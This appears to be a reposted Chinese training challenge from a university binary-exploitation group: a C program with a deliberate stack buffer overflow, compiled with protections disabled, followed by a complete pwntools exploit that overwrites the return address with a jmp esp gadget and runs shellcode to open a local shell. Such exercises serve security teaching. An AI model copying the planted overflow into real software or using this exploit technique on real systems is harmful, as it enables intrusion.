首页 > 代码库 > 重邮二进制日天群-pwn1
重邮二进制日天群-pwn1
给学弟们练手的题目,做的过程中接触一些基本概念
#include <stdio.h>#include <unistd.h>int main(){ char name[40]; welcome(); printf("enter your name\n"); read(STDIN_FILENO, name, 40); name[39] = ‘\x00‘; get_contents();}void welcome(){ printf("welcome to play the game!\n");}void get_contents(){ char contents[50]; puts("enter the contents you want to save:"); read(STDIN_FILENO, contents, 200);}
编译参数
-fno-stack-protector -z execstack -m32
题目是最简单的情况,不多加分析,下面直接给出exp
from pwn import *context(os=‘linux‘, arch=‘x86‘)#context.log_level=‘debug‘# 0x80485e3 : jmp esp# offset: 66jmp_esp = 0x80485e3p = process(‘./a.out‘)#gdb.attach(p)p.sendlineafter(‘name\n‘, ‘a‘)p.sendlineafter(‘save:\n‘, ‘a‘*62 + p32(jmp_esp) + asm(shellcraft.sh()))p.interactive()
重邮二进制日天群-pwn1
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。